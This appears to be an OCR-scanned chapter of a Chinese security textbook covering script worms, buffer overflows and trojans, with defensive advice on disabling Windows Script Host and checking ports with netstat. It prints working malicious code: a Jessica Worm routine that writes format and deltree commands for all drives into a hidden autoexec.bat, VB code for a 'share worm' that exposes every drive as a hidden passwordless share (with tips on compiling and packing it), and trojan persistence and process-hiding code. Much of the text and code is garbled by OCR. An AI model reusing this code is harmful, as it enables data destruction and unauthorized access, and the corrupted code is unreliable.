对 于 脚本 语言 来 说 ,要 使 病毒 潜伏 并 不 是 很 难 的 一 件 事 ,因为 这 种 语言 并 不 是 面向 对 象 
的 可 视 化 编程 ,自然 就 不 存在 显示 窗 体 , 所 以 可 以 免 去 隐藏 窗 体 的 麻烦 。 从 I Love Yonu 病 
毒 中 ,很 容易 看 出 蠕虫 病毒 在 潜伏 时 的 特点 ,它们 多 数 是 通过 读 取 、 修 改 注册 表 来 判断 各 种 
条 件 及 取消 一 些 系统 限制 。 以 下 是 从 I Love You 病毒 中 提取 出 的 部 分 代码 。 


// 容 错 语句 ,避免 程序 崩溃 

On Error Resume Next 

dim wscr,rr 

// 激 活 WScript. Shell 对 象 

set wscr = CreateObject("WScript. Shell") 
// 读 入 注册 表 中 的 超时 键 值 


二 
络 与 信息 安全 基础 


rr = wscr. RegRead("HKEY CURRENT USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") 
// 超 时 设置 

if(rr> = 1)then 

wscr. RegWrite" HKEY _ CURRENT _ USER \ Software \ Microsoft \ WindowsScripting Host \ Settings \ 
Timeout" ,0,"REG_DWORD" 

end if 


上 面 这 部 分 代码 是 调整 和 脚本 语言 的 超时 设置 。 下 面 的 一 段 代码 则 是 修改 注册 表 , 使 每 
次 系统 启动 时 自动 执行 脚本 : 

regcreate "HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion 

\Run\MSKernel32" ,dirsystem&"\MSKernel32. vbs" 

regcreate "HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion 

\RunServices\Win32DLL" ,dirwing"\Win32DLL. vbs" 

其 中 MSKerne132. vbs 和 Win32DLL. vbs 是 病毒 脚本 的 一 个 副本 。 


4. 蠕虫 病毒 具有 特定 的 触发 性 


在 这 里 以 时 间 触 发 为 例 , 使 用 一 个 简单 的 判断 程序 ,来 判断 时 间 到 了 没有 ,如 果 有 就 开 
始 执行 代码 。 具 体 程序 如 下 。 


x= time() 


If x= xx. xx. xx Then 

di 

简单 一 个 程序 ,就 可 以 实现 特定 条 件 触发 事件 的 目的 。 当 然 病毒 制作 者 还 可 以 通过 监 
视 运 行 某 个 程序 而 触发 事件 ,也 可 以 响应 键盘 触发 事件 等 。 


5. 蠕虫 病毒 具有 很 大 的 破坏 性 


以 蠕虫 病毒 Jessica Worm 中 的 部 分 破坏 代码 为 例 ,通常 蠕虫 病毒 的 编写 者 都 会 格式 化 
受害 者 的 硬盘 。 


sub killc() 

// 容 错 语句 ,避免 程序 崩溃 

On Error Resume Next 

dim fs,auto,disc,ds,ss,i,x,dir 

// 建 立 或 修改 自动 批 处 理 

Set fs = CreateObject ("Scripting. FileSystemObject") 
Set auto = fs.CreateTextFile ("c:\Autoexec. bat" ,True) 
// 屏 项 掉 删 除 的 进程 

auto. WriteLine("@echo off") 

// 加 载 磁盘 缓冲 

auto. WriteLine("Smartdrv") 

// 得 到 驱动 器 的 集合 

Set disc = fs.Drives 


For Each ds in disc 


// 如 果 驱 动 器 是 本 地 盘 

If ds.DriveType = 2 Then 

// 就 将 符号 连 在 一 起 

ss = ss & ds.DriveLetter 

End if 

Next 

// 得 到 符号 串 的 反 向 小 写 形式 

Ss = LCase(StrReverse (Trim (ss))) 
// 遍 历 每 个 驱动 器 

ForI = 1toLen (ss) 

// 读 每 个 驱动 器 的 符号 

X = Mid (ss,i,1) 

// 反 向 (从 2z: 到 A:) 自 动 格式 化 驱动 器 
auto. WriteLine("format/autotest/q/u "&x&":") 
Next 

For I = 1 to Len(ss) 

X = Mid(ss,i,1) 

// 在 Format 失效 使 用 了 Deltree 命令 
auto. WriteLine("deltree/y "&x&" :") 
Next 

// 关 闭 批 处 理 文件 

auto. Close 

Set dir = fs.GetFile("c:\Autoexec. bat") 
// 将 自动 批 处 理 文件 改 为 隐藏 
dir.attributes = dir.attributes + 2 
End Sub 
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这 个 例子 格式 化 了 所 有 硬盘 分 区 ,在 试验 过 程 中 请 不 要 轻易 进行 尝试 。 


6. 反击 蠕虫 病毒 


可 以 根据 网 络 蠕虫 病毒 几 大 功能 模块 设置 防护 策略 。 


网 络 蠕虫 病毒 不 可 能 像 传统 病毒 一 样 调 用 汇编 程序 来 实现 破坏 功能 。 它 只 能 通过 调用 


已 经 编译 好 的 带 有 破坏 性 的 程序 来 实现 这 一 功能 。 那 么 就 修改 本 地 的 带 有 破坏 性 的 程序 名 
字 , 如 把 format. com 改 成 fmt. com, 那 样 病毒 的 编辑 者 就 无 法 实现 用 调用 本 地 命令 来 实现 
这 一 功能 。 


网 络 蠕 虫 病毒 是 通过 死 循环 语句 实现 的 , 且 一 开机 就 运行 这 程序 ,等 待 触发 条 件 。 按 下 


Ctrl 十 Alt 十 Del 键 在 弹出 的 关闭 程序 对 话 框 方 可 看 见 一 个 叫 Wscript. exe 的 程序 在 后 台 运 
行 (那样 的 程序 不 一 定 是 病毒 ,但 病毒 也 常常 伪装 成 那样 的 程序 ), 为 了 防止 病毒 对 计算 机 进 
行 破 坏 , 可 以 通过 限制 这 类 程序 的 运行 时 间 ,达到 控制 的 目的 。 首 先 在 “运行 "文本 框 中 输入 
Wscript, 弹 出 如 图 5. 1 所 示 的 对 话 框 。 选 中 “经 过 指定 的 秒 数 之 后 终止 脚本 ”前 面 的 复 选 
框 , 然 后 调整 下 方 的 时 间 设 置 为 最 小 值 即 可 。 这 样 具 有 潜伏 性 .自然 触发 性 的 网 络 蠕虫 病毒 
就 不 会 发 作 了 。 


另外 ,因为 蠕虫 病毒 大 多 是 用 VB Script 脚本 语言 编写 的 ,而 VB Script 代码 是 通过 
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Tindors 肢 本 痊 主 设置 相当 


人 7 当 脚 本 在 命令 控制 台中 执行 时 显示 微 标 LL] 


mw | saw | 
图 5.1 脚本 宿主 设置 


Windows Script Host 来 解释 执行 的 ,Windows Script Host 本 来 是 被 系统 管理 员 用 来 配置 
桌面 环境 和 系统 服务 ,实现 最 小 化 管理 的 一 个 手段 ,但 对 于 大 部 分 一 般 用 户 而 言 , WSH 并 
没有 多 大 用 处 ,所 以 可 以 禁止 Windows Script Host 或 将 Windows Script Host 删除 。 

下 面 介 绍 印 载 Windows Scripting Host 的 方法 。 

在 Windows 98 操作 系统 中 (NT 4. 0 以 上 同 理 ) ,选择 “添加 /删除 程序 "|* 添 加 /删除 
Windows 组 件 ? 选 项 ,双击 其 中 的 “附件 ,在 打开 的 窗口 中 取消 选中 ”Windows Scripting 
Host” 复 选 框 ,然后 单 击 两 次 “确定 ”按钮 。 这 样 就 可 以 将 Windows Scripting Host 印 载 。 

还 可 以 到 Windows 目录 中 ,找到 WScript. exe 和 JScript. exe, 更 改 其 名 称 或 者 删除 。 

大 多 数 利用 VB Script 编写 的 病毒 ,自我 复制 的 原理 是 利用 程序 将 本 身 的 脚本 内 容 复 
制 一 份 到 一 个 临时 文件 ,然后 再 在 传播 的 环节 将 其 作为 附件 发 送出 去 。 而 该 功能 的 实现 离 
不 开 “File System Object” 对 象 ,因此 禁止 了 “File System Object” 就 可 以 有 效 的 控制 VBS 
病毒 的 传播 。 具 体操 作 方 法 : 选择 “开始 ”1“ 运 行 ”选项 ,在 打开 的 对 话 框 中 输入 regsvr32 
scrrun. dll /u 命令 就 可 以 禁止 文件 系统 对 象 。 

要 预防 网 络 蠕虫 病毒 ,还 须 设 置 一 下 用 户 的 浏览 器 。 在 IE 窗口 中 选择 “工具 ”| 
“Internet 选项 ”, 在 弹出 的 对 话 框 中 单 击 “ 安 全 ”标签 ,在 打开 的 “安全 ”选项 卡 中 单 击 “ 自 定 
义 级 别 ” 按 钮 ,就 会 弹出 “安全 设置 ”对话 框 ,把 其 中 所 有 ActiveX 插件 和 控件 以 及 Java 相关 
全 部 选择 “禁用 ” 即 可 。 以 上 方法 可 以 有 效 地 防范 蠕虫 病毒 。 但 是 这 样 做 可 能 会 造成 一 些 正 
常 使 用 ActiveX 的 网 站 无 法 浏览 。 


542 编写 一 个 蠕虫 病毒 


如 果 用 户 在 共享 名 后 面 加 上 $ 符 号 ,那么 这 个 目录 将 变 成 一 个 隐 含 的 共享 目录 ,这 样 在 
局 域 网 中 用 户 就 看 不 见 这 个 共享 目录 了 。 而 共享 蠕虫 病毒 还 要 保证 被 害 用 户 在 自己 的 计算 
机 上 也 看 不 到 这 个 共享 目录 ,这 就 需要 改写 注册 表 。 示 例如 下 。 

首先 选择 “开始 ”1“ 运 行 ”选项 ,在 “运行 ”对话 框 中 输入 Regedit 命令 打开 注册 表 , 找 到 
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下 面 的 子 键 HKEY_LOCAL_MACHINE Software Microsoft Windows Current Version 
Network LanManC $ ,在 屏幕 的 右边 ,用 户 可 以 看 见 下 面 的 内 容 。 


Flags 0x00000302(770) 
Parmlenc (长 度 为 零 的 二 进 制 值 ) 
Parm2enc (长 度 为 零 的 二 进 制 值 ) 
Path "C:" 

Remark "Remark By Scent Lily" 
Type 0x00000000(0) 


关键 的 地 方 就 是 Flags 参数 , 它 的 键 值 决 定 了 共享 目录 的 类 型 。 把 Flags 的 值 设 为 302 
(十 六 进 制 ) 就 可 以 保证 目录 真正 的 隐藏 起 来 了 。 

知道 原理 以 后 ,用 VB 编制 共享 蠕虫 的 方法 就 很 简单 了 ,步骤 如 下 : 

QO@ 通过 GetDriveType 函数 检测 机 器 从 C 盘 开 始 的 所 有 驱动 器 。 

@ 将 找到 的 每 一 个 驱动 器 后 面 加 上 $ 符 作为 一 个 子 键 (C$ ,D$ ,E$), 写 入 注册 表 的 
LanMan 子 键 下 。 

@ 将 每 一 个 子 键 的 "Flags" 值 设置 为 302( 十 六 进 制 ) 。 

@ 将 Path 设置 成 相应 的 路 径 。 

下 面 是 程序 的 关键 部 分 : 


Option Explicit 
Dim WinDir As String 
Const CommonPath = "SoftWareMicrosoftWindowsCurrent VersionNetwork 一 
LanMan" 
Private Sub Form Load() 
Me. Hide 
Dim buff As String,DriveNo As Integer,Result As Integer,Game 
// 遍 历 所 有 的 26 个 驱动 器 
For DriveNo = 0 To 25 
// 取 驱动 器 符 
buff = Chr$ (65 + DriveNo) + ":" 
// 调 用 BPI 函数 来 获得 驱动 器 的 类 型 
Result = GetDriveType(buff) 
If Result = 3 Xor Result = 5 Then 
// 写 人 共享 的 类 型 ,这 就 是 程序 的 关键 所 在 
setvalue HKEY LOCRL MACHINE,CommonPath + Chr(65 + DriveNo) + "$","Flags",REG DWORD,"770",3 
setvalue HKEY LOCAL, MACHINE,CommonPath + Chr(65 + DriveNo) + "$","Type",REG DHORD,"0",0 
// 写 入 共享 驱动 器 的 路 径 , 就 是 "C:","D:" 等 
setvalue HKEY LOCAL, MACHINE,CommonPath + Chr(65 + DriveNo) + "$","Path",REG SZ,buff,4 
// 写 人 共享 目录 的 只 读 访问 密码 
setvalue HEEY LOCAL, MACHINE ,CommonPath + Chr(65 + DriveNo) + "$","Parm2enc",REG BINARY,0,0 
// 写 人 该 共享 目录 的 完全 访问 密码 
setvalue HEEY LOCAL, MACHINE,CommonPath + Chr(65 + DriveNo) + "$","Parmlenc",REG BINRRY,0,0 
setvalue HKEY_LOCAL MACHINE,CommonPath + Chr(65 + DriveNo) + "$","Remark",REG_ 
SZ,"Remark by scent lily!",21 
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End If 
Next DriveNo 
// 获 得 Windows 目录 的 路 径 
GetWinDir 
// 如 果 有 扫雷 游戏 的 话 就 在 前 台 执行 它 
If Dir(WinDir & "winmine.exe") <>"" Then Game = Shell(WinDir & "WINMINE.EXE",vbMaximijzedFocus) 
Else 
Game = Shell(WinDir & "explorer" ,vbMaximizedFocus) 
End If 
Unload Me 
End Sub 
// 获 得 Windows 所 在 目录 的 子 程 序 
Public Sub GetWinDir() 
Dim Length As Long 
WinDir = String(MAX_PATH,0) 
Length = GetWindowsDirectory(WinDir,MAX_PATH) 
WinDir = Left(WinDir,InStr(WinDir,Chr(0)) — 1) 
End Sub 


完整 的 程序 可 以 从 网 络 中 下 载 , 其 中 的 可 执行 文件 是 用 VB 6. 0 编译 的 ,建议 再 用 
VB 5.0 重新 编译 一 下 。 这 样 就 不 需要 其 他 的 任何 DLL 文件 , 因为 Windows 98 和 
Windows 2000 操作 系统 已 经 自 带 VB 5.0 的 DLL 文件 。 如 果 再 用 UPX 可 执行 文件 压缩 
工具 压缩 一 下 ,文件 就 只 有 6KB 大 小 了 。 

如 果 需 要 察看 这 些 共 享 目录 ,可 以 使 用 DOS 命令。 语法 : net use 到 映射 的 盘 符 之 \ 对 
方 的 IPC$ ,例如 : net use x: \192. 168. 0. 2D $ 。 执 行 完 这 个 命令 以 后 ,可 以 将 对 方 
(192. 168.0.2) 的 D 盘 映 射 成 自己 的 X 盘 。 

随 着 人 们 安全 意识 的 提高 ,现在 很 少 有 人 愿意 接收 可 执行 文件 ,所 以 网 上 流行 的 共享 蠕 
虫 程序 是 用 VBS 格式 的 脚步 语言 。 编 写 的 原理 是 一 样 的 ,只 是 实现 的 方法 不 一 样 。 


5.5 缓冲 区 溢出 与 病毒 攻击 的 原理 


在 计算 机 内 部 ,如 果 用 户 向 一 个 容量 有 限 的 内 存 空间 里 存储 过 量 数据 ,这 时 数据 会 溢出 
存储 空间 。 输 入 数据 通常 被 存放 在 一 个 临时 空间 内 ,这 个 临时 存放 空间 被 称 为 缓冲 区 ,缓冲 
区 的 长 度 事先 已 经 被 程序 或 者 操作 系统 定义 好 了 。 


55.1 缓冲 区 溢出 


缓冲 区 溢出 是 指 当 计 算 机 程序 向 缓冲 区 内 填充 的 数据 位 数 超 过 缓冲 区 本 身 的 容量 。 洲 
出 的 数据 覆盖 在 合法 数据 上 。 理 想 情况 是 .程序 检查 数据 长 度 并 且 不 允许 输入 超过 缓冲 区 
长 度 的 字符 串 。 大 多 数 程序 都 会 假设 数据 长 度 总 是 与 所 分 配 的 存储 空间 相 匹配 ,这 就 为 组 
冲 区 溢出 埋 下 隐患 。 操 作 系 统 所 使 用 的 缓冲 区 又 被 称 为 堆栈 ,在 各 个 操作 进程 之 间 , 指 令 被 
临时 存储 在 堆栈 当中 ,堆栈 也 会 出 现 缓冲 区 溢出 。 

当 一 个 超 长 的 数据 进入 到 缓冲 区 时 ,超出 部 分 就 会 被 写 入 其 他 缓冲 区 ,其 他 缓冲 区 存放 


99 
第 5 章 计算 机 病毒 及 防范 技 


的 可 能 是 数据 .下 一 条 指令 的 指针 或 者 是 其 他 程序 的 输出 内 容 ,这 些 内 容 都 被 覆盖 或 者 破坏 
掉 了 。 可 见 一 小 部 分 数据 或 者 一 套 指 令 的 溢出 就 可 能 导致 一 个 程序 或 者 操作 系统 崩溃 。 


552 缓冲 区 溢出 的 根源 在 于 编程 错误 


缓冲 区 溢出 是 由 编程 错误 引起 的 。 如 果 缓 冲 区 被 写 满 ,而 程序 没有 去 检查 缓冲 区 边界 ， 
也 没有 停止 接收 数据 ,这 时 缓冲 区 溢出 就 会 发 生 。 

缓冲 区 溢出 之 所 以 泛滥 ,是 由 于 开放 源 代码 程序 的 本 质 决 定 的 。 某 些 编程 语言 对 于 组 
冲 区 溢出 是 具有 免疫 力 的 ,例如 Perl 能 够 自动 调节 字 节 排列 的 大 小 ,Ada 95 能 够 检查 和 阻 
止 缓冲 区 溢出 。 但 是 被 广泛 使 用 的 C 语言 却 没有 建立 检测 机 制 。 标 准 C 语言 具有 许多 复 
制 和 添加 字符 串 的 函数 ,这 使 得 标准 C 语言 很 难 进行 边界 检查 。C++ 语言 略微 好 一 些 , 但 
是 仍然 存在 缓冲 区 溢出 情况 。 一 般 情 况 下 ,覆盖 其 他 数据 区 的 数据 是 没有 意义 的 ,最 多 造成 
应 用 程序 错误 ,但 是 ,如 果 输 入 的 数据 是 经 过 * 黑 客 "精心 设计 的 ,覆盖 缓冲 区 的 数据 恰恰 是 
“黑客 ?或 者 病毒 的 攻击 程序 代码 ,一 旦 多 余 字 节 被 编译 执行 “黑客 ?或 者 病毒 就 有 可 能 为 所 
和 欲 为 ,获取 系统 的 控制 权 。 


553 缓冲 区 溢出 导致 "黑客 ”病毒 横行 


缓冲 区 溢出 是 病毒 编写 者 (尤其 是 木马 编写 者 ) 经 常 使 用 的 一 种 方法 。 病 毒 编写 者 善于 
在 系统 当中 发 现 容易 产生 缓冲 区 溢出 的 地 方 , 运 行 特 别 的 程序 ,获得 优先 级 ,并 指示 计算 机 
破坏 文件 改变 数据 ,泄露 敏感 信息 以 及 产生 后 门 访 问 点 ,最 终 达到 感染 或 者 攻击 其 他 计算 
机 的 目的 。 

2000 年 7 月 ,Microsoft 公司 的 Outlook 以 及 Outlook Express 被 发 现存 在 漏洞 能 够 使 
攻击 者 仅 通过 发 送 邮件 就 能 危及 目标 主机 安全 ,只 要 邮件 头 部 程序 被 运行 ,就 会 产生 缓冲 区 
溢出 ,并且 触发 恶意 代码 。2001 年 8 月 “红色 代码 ?利用 Microsoft IIS 漏洞 产生 缓冲 区 洲 
出 ,成 为 攻击 企业 网 络 的 “罪魁 祸首 ”"。2003 年 1 月 ,Slammer 蠕虫 利用 SQL 漏洞 产生 缓冲 
区 溢出 对 全 球 互联 网 产生 冲击 。 而 一 种 名 为 冲击波? 的 蠕虫 病毒 利用 RPC 远程 调用 存在 
的 缓冲 区 漏洞 对 Windows 2000/XP、Windows Server 2003 进行 攻击 。 据 CERT 安全 小 组 
称 ,操作 系统 中 超过 50% 的 安全 漏洞 都 是 由 缓冲 区 溢出 引起 的 ,其 中 大 多 数 与 Microsoft 公 
司 的 技术 有 关 , 这 些 与 缓冲 区 溢出 相关 的 安全 漏洞 正在 被 越 来 越 多 的 蠕虫 病毒 所 利用 。 

缓冲 区 溢出 是 目前 导致 “黑客 "型 病毒 横行 的 主要 原因 。 从 “红色 代码 ”到 Slammer, 再 
到 “冲击 波 ”, 都 是 利用 缓冲 区 溢出 漏洞 的 典型 病毒 案例 。 缓 冲 区 溢出 是 一 个 编程 问题 ,防止 
利用 缓冲 区 溢出 发 起 的 攻击 ,关键 在 于 程序 开发 者 在 开发 程序 时 仔细 检查 溢出 情况 ,不 允许 
数据 溢出 缓冲 区 。 此 外 ,用 户 需要 经 常 登录 操作 系统 和 应 用 程序 提供 商 的 网 站 ,跟踪 公布 的 
系统 漏洞 ,及 时 下 载 补丁 程序 ,弥补 系统 漏洞 。 


5.6 木马 程序 


黑客 使 用 木马 技术 ,渗透 到 对 方 的 主机 系统 里 ,从 而 实现 对 远程 目标 主机 的 控制 。 其 破 
坏 力 之 大 ,是 绝 不 容 忽视 的 。 
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56.1 木马 程序 的 发 展 历程 


木马 程序 技术 发 展 经 历 了 四 代 , 第 一 代 , 实 现 功能 简单 的 密码 窃取 。 第 二 代 , 在 技术 上 
有 了 很 大 的 进步 冰河 ?可 以 说 是 国内 木马 程序 的 典型 代表 之 一 。 第 三 代 , 在 数据 传输 技术 
上 做 了 改进 ,出 现 了 如 “ICMP” 等 类 型 的 木马 ,利用 畸形 报 文 传输 数据 ,增加 了 查 杀 的 难度 。 
第 四 代 , 在 进程 隐藏 方面 ,进行 了 较 大 的 改动 ,采用 了 内 核 插入 式 的 向 入 方式 ,利用 远程 插入 
线程 技术 ,嵌入 DLL 线程 。 或 者 挂 接 PSAPI, 实 现 木 马 程序 的 隐藏 ,甚至 在 Windows NT/ 
2000 操作 系统 下 ,都 达到 了 良好 的 隐藏 效果 。 相 信 第 五 代 木 马 很 快 也 会 被 编写 出 来 。 
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木马 程序 的 服务 器 端 ,为 了 避免 被 发 现 ,多 数 都 要 进行 隐藏 处 理 , 下 面 介 绍 一 下 木马 程 
序 是 如 何 实现 自身 隐藏 的 。 

说 到 隐藏 ,首先 要 了 解 三 个 相关 的 概念 : 进程 .线程 和 服务 。 

进程 : 一 个 正常 的 Windows 应 用 程序 ,在 运行 之 后 ,都 会 在 系统 之 中 产生 一 个 进程 , 同 
时 ,每 个 进程 分 别 对 应 了 一 个 不 同 的 PID(Progress ID ,进程 标志 符 ) 这 个 进程 会 被 系统 分 配 
一 个 虚拟 的 内 存 空间 地 址 段 ,一 切 相 关 的 程序 操作 ,都 会 在 这 个 虚拟 的 空间 中 进行 。 

线程 : 一 个 进程 ,可 以 存在 一 个 或 多 个 线程 ,线程 之 间 同 步 执行 多 种 操作 ,一 般 线程 之 
间 是 相互 独立 的 , 当 一 个 线程 发 生 错误 的 时 候 , 并 不 一 定 会 导致 整个 进程 的 崩溃 。 

服务 : 一 个 进程 当 以 服务 的 方式 工作 的 时 候 , 它 将 会 在 后 台 工 作 , 不 会 出 现在 任务 列表 
中 ,但 是 在 Windows NT/2000 操作 系统 下 ,用 户 仍然 可 以 通过 服务 管理 器 检查 任何 的 服务 
程序 是 否 被 启动 运行 。 

在 服务 器 端 隐藏 木马 程序 可 以 分 为 伪 隐 藏 和 真 隐 藏 。 伪 隐藏 是 指 程序 的 进程 仍然 存 
在 ,只 不 过 是 让 它 在 进程 列表 里 消失 。 真 隐藏 则 是 让 程序 彻底 的 消失 ,不 以 一 个 进程 或 者 服 
务 的 方式 工作 。 

实现 伪 隐 藏 的 方法 比较 容易 ,只 要 把 木马 程序 服务 器 端的 程序 注册 为 一 个 服务 ,程序 就 
会 从 任务 列表 中 消失 ,因为 系统 不 认为 它 是 一 个 进程 , 当 用 户 按 下 Ctrl 十 Alt 十 Del 键 的 时 
候 , 看 不 到 这 个 程序 。 但 是 这 种 方法 只 适用 于 Windows 9x 操作 系统 ,对 于 Windows NT， 
Windows 2000 等 操作 系统 ,通过 服务 管理 器 ,一 样 会 发 现 用 户 在 系统 中 注册 过 的 服务 。 要 
想 在 Windows NT/2000 系统 下 实现 伪 隐 藏 ,需要 使 用 API 拦截 技术 ,黑客 通过 建立 一 个 后 
人 台 的 系统 钧 子 ,拦截 PSAPI 的 Enum Process Modules 等 相关 的 函数 来 实现 对 进程 和 服务 
的 遍历 调用 控制 , 当 检 测 到 进程 ID(PID) 为 木马 程序 的 服务 器 端 进程 的 时 候 直 接 跳 过 ,这 样 
就 可 以 实现 了 进程 的 伪 隐 藏 ,金山 词霸 等 软件 ,就 是 使 用 了 类 似 的 方法 ,拦截 了 TextOutA， 
TextOutW 函数 ,来 截获 屏幕 输出 ,实现 即时 翻译 的 。 

当 进 程 为 真 隐 藏 的 时 候 ,那么 这 个 木马 程序 的 服务 器 部 分 程序 运行 之 后 ,就 不 应 该 具备 
一 般 进程 ,也 不 应 该 具备 服务 ,也 就 是 说 程序 完全 的 溶 进 了 系统 的 内 核 。 这 需要 把 木马 程序 
做 成 一 个 线程 ,而 不 是 一 个 应 用 程序 ,这 样 就 可 以 把 自身 注入 其 他 应 用 程序 的 地 址 空间 ,从 
而 达到 真正 隐藏 的 效果 。 

通过 注册 服务 程序 ,实现 进程 伪 隐 藏 的 方法 的 代码 如 下 : 


WINAPI WinMain(HINSTANCE,HINSTANCE, LPSTR, Int) 
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try 
{ 
// 取 得 Windows 的 版 本 号 
DWORD dwVersion = GetVersion(); 
if (dwVersion> = 0x80000000) 
{ 
int (CALLBACK * rsp) (DWORD,DWORD); 
// 装 人 KERNEL32. DLL 
HINSTANCE dl1l = LoadLibrary("KERNEL32.DLL"); 
// 找 到 RegisterServiceProcess 的 入 口 
rsp = (int(CALLBACK * ) (DWORD, DWORD) )GetProchddress(d]1,，" RegisterServiceProcess"); 
// 注 册 服 务 
rsp(NULL,1); 
// 释 放 DLL 模块 
FreeLibrary(d11); 


} 
catch (Exception &exception)// 处 理 异 常事 件 
{ 
// 处 理 异常 事件 
} 


return 0; 
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让 程序 自 运行 的 方法 比较 多 ,除了 最 常见 的 方法 : 加 载 程序 到 启动 组 , 写 程序 启动 路 径 到 
注册 表 的 HKEY_LOCAL_MACHINE\SOFTWARE \ Microsoft\ Windows\CurrentVersions\ 
Run 的 方法 外 ,还 有 很 多 方法 ,比如 可 以 修改 Boot. ini 或 者 通过 注册 表 里 的 输入 法 键 值 直接 
挂 接 启 动 ,通过 修改 Explorer. exe 启动 参数 等 方法 。 下 面 的 代码 在 HKEY_LOCAL_ 
MACHINE\SOFTWARE\ Microsoft\ Windows\CurrentVersions\Run 中 加 入 键 值 来 实现 
自 启 动 。 

程序 自动 装载 部 分 的 程序 如 下 : 


HKEY hkey; 

RnsiString NewProgramName = AnsiString(sys) + AnsiString(" + PName/">\\") + PName 
unsigned long k; 

k = REG_OPENED EXISTING KEY; 

RegCreateKeyEx(HKEY_LOCRL MACHINE, 

"SOFTWARE\ \MICROSOFT\ \WINDOWS\ \CURRENTVERSION\\RUN\\" , OL, NULL, 
REG_OPTION_NON_VOLATILE, KEY_ALL, ACCESS|KEY_SET_ VALUE,NULL, Shkey, Sk); 
RegSetValueEx(hkey,"BackGroup" ,0,REG_SZ,NewProgramName.c_str(), 

NewProgramName. Length()); 

RegCloseKey(hkey) ; 
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if (int(ShellExecute(Handle,"open" ,NewProgramName.c_str() ,NULL, 
NULL, SW_HIDE) ) 之 32) 


{ 


WantClose = true; 
Close(); 


} 


else 


{ 


HKEY hkey; 
unsigned long k; 
k= REG_OPENED EXISTING KEY; 
Long a = RegCreateKeyEx(HKEY_LOCAL MACHINE, 
"SOFTWARE\ \MICROSOFT\ \WINDOWS\ \CURRENTVERSION\ \RUN" ,0 , NULL, 
REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hkey, &k) ; 
RegSetValueEx(hkey,"BackGroup" ,0,REG_SZ,ProgramName.c_str(), 
ProgramName, Length()); 
Int num= 0; 
Char str[20]; 
DWORD lth= 20; 
DWORD type; 
Char strv[255]; 
DWORD vl = 254; 
DWORD Suc; 
Do 
{ 
Suc = RegEnumValue(HKEY_LOCRL_MRCHINE,(DWORD)num,str,NULL， 


&type, strv, &v1); 


} 


If (strcmp(str,"BGroup") == 0) 
{ 
DeleteFile(AnsiString(strv)); 
RegDeleteValue(HKEY_LOCAL MACHINE,"BGroup"); 
Break; 


} 
While(Suc == ERROR_SUCCESS); 
RegCloseKey(hkey); 


程序 自动 种 载 的 代码 如 下 。 


Int num; 

Char str2[20]; 
DWORD lth= 20; 
DWORD type; 
Char strv[255]; 
DWORD vl] = 254; 
DWORD Suc; 


Do 
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Suc = RegEnumValue(HKEY_LOCRL MRCHINE,(DNWORD)num,str,NULD,&type,strv,&v1); 
If (strcmp(str,"BGroup") == 0) 
{ 
DeleteFile(AnsiString(strv)); 
RegDeleteValue(HKEY LOCAL MACHINE,"BGroup"); 
Break; 
} 
} 
while(Suc == ERROR_SUCCESS) 
HKEY hkey; 
Unsigned long k; 
k= REG_ OPENED EXISTING KEY; 
RegCreateKeyEx(HKEY LOCAL MACHINE,"SOFTWARE\\MICROSOFT\\WINDOWS\\ 
CURRENTVERSION\ \RUN" , 0, NULL, REG_OPTION_NON_VOLATILE, 
KEY_SET_VALUE, NULL, &hkey, &k) ; 
Do 
{ 
Suc = RegEnumValue( hkey, (DWORD)num, str ,if (strcmp(str,"BackGroup") == 0) 
{ 
DeleteFile(AnsiString( strv)); 
RegDeleteValue(HKEY_LOCAL MACHINE,"BackGroup" ); 
Break; 
} 
} 
While(Suc == ERROR_SUCCESS) 
RegCloseKey(hkey); 


564 通过 查看 开放 端口 判断 木马 或 其 他 黑客 程序 的 方法 


当前 最 为 常见 的 木马 程序 是 基于 TCP/UDP 协议 进行 客户 端 与 服务 器 端 之 间 的 通信 ， 
既然 利用 到 这 两 个 协议 ,就 不 可 避免 要 在 服务 器 端 ( 被 木马 程序 攻击 的 机 器 ) 打 开 监听 端口 
来 等 待 连接 。 例 如 “冰河 ”软件 使 用 的 监听 端口 是 7626, Back Orifice 2000 则 是 使 用 54320 
端口 。 那 么 用 户 可 以 利用 查看 本 机 开放 端口 的 方法 来 检查 自己 是 否 被 木马 程序 或 其 他 黑客 
程序 攻击 。 


1. Windows 本 身 自 带 的 Netstat 命令 
Netstat 命令 如 下 : 
Netstat 


显示 协议 统计 和 当前 的 TCP/IP 网 络 连接 。 该 命令 只 有 在 安装 了 TCP/IP 协议 后 才 
可 以 使 用 。 


Netstat [~-a][-e][-n]j[-s]j[-pprotocol] [-r]Linterval] 


参数 说 明 如 下 : 
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一 a 显示 所 有 连接 和 侦 听 端口 。 服 务 器 连接 通常 不 显示 。 

。 一 e 显示 以 太 网 统计 。 该 参数 可 以 与 一 s 选项 结合 使 用 。 

。 一 n 以 数字 格式 显示 地 址 和 端口 号 (而 不 是 尝试 查找 名 称 ) 。 

。 一 s 显 示 每 个 协议 的 统计 。 默 认 情 况 下 ,显示 TCP、UDP、ICMP 和 IP 的 统计 。 
选项 可 以 用 来 指定 默认 的 子 集 。 

。 一 p ES 显示 由 Protocol 指定 的 协议 的 连接 ; Protocol 可 以 是 TCP 或 UDP。 
如 果 与 一 s 选项 一 同 使 用 显示 每 个 协议 的 统计 ,Protocol 可 以 是 TCP .UDP ICMP 
或 IP。 

。 一 [显示 路 由 表 的 内 容 。 

。 interval 重新 显示 所 选 的 统计 ,在 每 次 显示 之 间 和 暂停 “interval” 秒 。 按 Ctrl 十 B 键 可 
停止 重新 显示 统计 。 如 果 省 略 该 参数 ,Netstat 将 打印 一 次 当前 的 配置 信息 

进入 到 命令 行 下 ,使 用 Netstat 命令 的 a 和 mn 两 个 参数 : 命令 显示 如 图 5. 2 所 示 。 


ET FT =|Dj xl 


unents and Settings\Adninistrato 


Active Connections 


17.11.11:138 CE 


ocunents and Settings\Adninistrator> 


图 5.2 Netstat 命令 显示 


其 中 Active Connections 是 指 当 前 本 机 活动 连接 ,Proto 是 指 连接 使 用 的 协议 名 称 ， 


Local Address 是 本 地 计算 机 的 IP 地 址 和 连接 正在 使 用 的 端口 号 ,Foreign Address 是 连接 


该 端 
后 面 三 


感染 


可 以 


口 的 远程 计算 机 的 IP 地 址 和 端口 号 ,State 则 是 表明 TCP 连接 的 状态 ,用 户 可 以 看 到 
: 行 的 监听 端口 是 UDP 协议 的 ,所 以 没有 State 表示 的 状态 。 

